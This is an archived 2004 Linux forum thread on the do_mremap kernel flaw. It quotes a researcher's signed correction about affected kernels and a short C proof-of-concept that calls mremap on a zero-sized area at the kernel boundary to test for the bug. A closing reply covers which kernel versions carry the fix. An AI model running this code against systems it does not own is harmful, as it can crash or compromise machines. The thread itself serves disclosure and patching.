Critical Kernel vulnerability

Protecting your Linux box

Critical Kernel vulnerability

Postby zaeemarshad » Wed Jan 07, 2004 12:12 am

take a look at this

http://www.infoworld.com/article/04/01/ ... ole_1.html

thats strange. two flaws in the kernel!!! I thought they changed the VM in 2.6 series???

Regards
Zaeem
zaeemarshad
Lieutenant Colonel
 
Posts: 660
Joined: Sat Jul 06, 2002 12:35 pm
Website: http://zaeem.no-ip.org
WLM: zarshadvirk@hotmail.com
Yahoo Messenger: negativecreep61@yahoo.com
AOL: zarshadvirk
Location: Islamabad

Re: Critical Kernel vulnerability

Postby LinuxFreaK » Wed Jan 07, 2004 2:15 am

Dear Zaeemarshad,
Salam,

zaeemarshad wrote:take a look at this
http://www.infoworld.com/article/04/01/ ... ole_1.html
thats strange. two flaws in the kernel!!! I thought they changed the VM in 2.6 series???


Date: Tue, 6 Jan 2004 17:30:35 +0100 (CET)
From: "Paul Starzetz" <ihaquer@isec.pl> Add to Address Book
To: vulnwatch@vulnwatch.org, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux mremap bug correction

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

our initial posting contains a mistake about the vulnerability of the
2.2
kernel series. Since the 2.2 kernel series doesn't support the
MREMAP_FIXED flag it is NOT vulnerable. The source states
"MREMAP_FIXED option added 5-Dec-1999" but it didn't make into recent
2.2.x. We apologize for inconvenience.

- --
Paul Starzetz
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE/+uKwC+8U3Z5wpu4RAqd0AJ4m0jn+BBYuxgZC3ZDRgwl4u7MsNACeNzGB
4DstLw+HNr703e19zrA3cjg=
=5S9B
-----END PGP SIGNATURE-----

Date: Mon, 5 Jan 2004 22:22:39 +0100
From: "Christophe Devine" <devine@iie.cnam.fr> Add to Address Book
To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux kernel do_mremap() proof-of-concept exploit code

The following program can be used to test if a x86 Linux system
is vulnerable to the do_mremap() exploit; use at your own risk.


Code: Select all

$ cat mremap_poc.c

/*
 *  Proof-of-concept exploit code for do_mremap()
 *
 *  Copyright (C) 2004  Christophe Devine and Julien Tinnes
 *
 *  This program is free software; you can redistribute it and/or
modify
 *  it under the terms of the GNU General Public License as published
by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 
02111-1307  USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    fork();

    return( 0 );
}


It is, but not in 2.6.1-rc1. From http://isec.pl/vulnerabilities/isec-0013-mremap.txt: And from http://kernel.org/pub/linux/kernel/v2.6 ... -2.6.1-rc2

Don't allow mremap of zero-sized areas. The do_mremap() vulnerability is fixed in the 2.6 kernel only in 2.6.1-rc2, where as you tested on 2.6.1-rc1. The latest version of the 2.2 kernel is 2.2.25, but there was no immediate changelog available. However, it was created on January 3 so I suspect it would have the patch?

Best Regards.
Farrukh Ahmed
LinuxFreaK
Site Admin
 
Posts: 5132
Joined: Fri May 02, 2003 10:24 am
ICQ: 82075802
Website: http://www.linuxpakistan.net/wiki/index.php?pagename=LinuxFreak
WLM: f4fahmed@hotmail.com
Yahoo Messenger: f4fahmed@yahoo.com
AOL: linuxpakistan@aol.com
Location: Karachi


Return to “%s” Security

Who is online

Users browsing this forum: No registered users and 1 guest

cron